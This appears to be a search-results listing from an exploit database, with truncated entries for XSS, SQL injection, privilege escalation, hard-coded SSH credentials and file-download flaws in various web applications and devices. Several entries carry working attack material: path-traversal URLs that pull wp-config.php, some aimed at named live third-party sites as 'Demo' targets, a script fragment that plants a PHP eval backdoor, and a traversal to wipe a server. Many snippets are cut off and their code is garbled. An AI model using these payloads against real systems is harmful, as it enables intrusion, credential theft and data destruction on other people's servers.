93 matches found
docsify 4.11.6 Cross Site Scripting Vulnerability
docsify versions 4.11.6 and below suffer from a cross site scripting vulnerability. This vulnerability exists due to an incomplete fix for CVE-2020-7680. -------------------------------------------------------------- docsify = 4.11.6 DOM-based Cross-Site Scripting Vulnerability...
Airties AIR5453 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5453 modem of the AirTies manufacturer. AirTies Air 5453 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5453 - Cross-site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Cobub Razor 0.8.0 - Physical path Leakage Vulnerability
Exploit for php platform in category web applications Exploit Title: Cobub Razor 0.8.0 Physical path Leakage Vulnerability Exploit Author: Kyhvedn Vendor Homepage: http://www.cobub.com/ Software Link: https://github.com/cobub/razor Version: 0.8.0 CVE : CVE-2018-8770 PoC: URL:...
UCOPIA Wireless Appliance Privilege Escalation Vulnerability
Exploit for linux platform in category local exploits CVE-2017-11322 UCOPIA Wireless Appliance 5.1.8 Privileges Escalation Asset description UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers. More than 12,000 UCOPIA solutions...
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vulnerability
Exploit for hardware platform in category remote exploits FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA,...
Wetransfer Clone Script - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Vulnerability: SQL Injection + Authentication Bypass Date: 18.01.2017 Vendor Homepage: http://www.scriptgiant.com/ Script Name: Wetransfer Clone Script Script Buy Now: http://www.popularclones.com/products/File-Transfer-Script Author: Ihsan...
PHP 5.6.26 and 7.0.11 Use After Free in unserialize() Vulnerability
Exploit for php platform in category remote exploits PoC: References: https://bugs.php.net/bug.php?id=73147 0day.today 2018-04-08...
Dendroid botnet Remote Code Execution Vulnerability
Bonus to remotely wipe the whole server: /deletepics.php?uid=../../Panel/ import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid...
iBanking botnet Shell Upload Vulnerability
Exploit for php platform in category web applications FiLEZ: 0day.today 2018-03-28...
phpSound Music Sharing Platform Multiple XSS Vulnerabilities
Usage Info phpSound is a Social Music Sharing Platform similar with SoundCloud, that allows users to upload their music online and share them with the world. ===Stored XSS=== Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields. Sample Payload for Stored...
Serenity Client Management Portal Multiple Vulnerabilities
Serenity is a light-weight, PHP-based online client management application that is built for freelancers. Focused on the intimate relationship between freelancers and their clients, Serenity makes heavy use of the jQuery library and AJAX protocols to do powerful things with little effort and to...
Mouse Media Script Stored XSS Vulnerability
Exploit for php platform in category web applications Login to system and upload any of your image. When uploading the image you need to enter the XSS Payload to "Title" and "Description" inputs. And then you can visit home page to check the uploaded payload. All these uploaded image and payload...
WordPress Markant Theme Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Poc: http://localhost/wp-content/themes/markant/download.php?file=../../wp-config.php Demo: http://www.markant.org/wp-content/themes/markant/download.php?file=../../wp-config.php --------------------------------------- Greetz to : All Egy-Shel...
WordPress SMWF Theme Arbitrary File Download Vulnerability
Exploit for php platform in category web applications POC : http://localhost/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php Demo : http://jaarverslag.smwf.nl/2013/wp-content/themes/SMWF/inc/download.php?file=2013/wp-config.php --------------------------------------- Greetz to : All...
Disqus 2.7.5 Cross Site Request Forgery / Cross Site Scripting
Exploit for php platform in category web applications disqus csrf reset -- -- alert1;' / 0day.today 2018-03-09...
Sendy 1.1.8.4 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Sendy SqlInject Date: 2014-02-24 Exploit Author: Hurley Vendor Homepage: http://sendy.co/ Software Link: http://sendy.co/ Version: 1.1.8.4 Demo page:...
FileStealer v1.3 Upload Vulnerability
Exploit for php platform in category web applications File: HWID: Hash: PC: 0day.today 2018-03-12...
Solaris 10 Patch Cluster File Clobber
Solaris 10 patch cluster suffers from a file clobber vulnerability in /tmp. File clobbering vulnerability in Solaris 10 patch cluster 3/27/2013 Larry W. Cashdollar @larry0 Hello, The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks: The contents of the file...
MyBB ChangUonDyu Extra File Chatbox Persistent XSS Vulnerability
Popular inferno-like chatbox built for MyBB! ChangUonDyu Extra File Chatbox Persistent XSS Location: Chatbox Notice Vendor: http://community.mybb.com/thread-63559.html PoC: function buildnotice global $fcbfile,$smilies; $noticef = filegetcontents$fcbfile'notice'; $handle =...
Wordpress Wp-TopBar 4.02 CSRF/XSS Vulnerabilities
Exploit for php platform in category web applications Exploit Title: WP-TopBar 4.02 CSRF Date: 2012-09-13 Author: Blake Entrekin Version: 4.02 Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ ------------------- CS...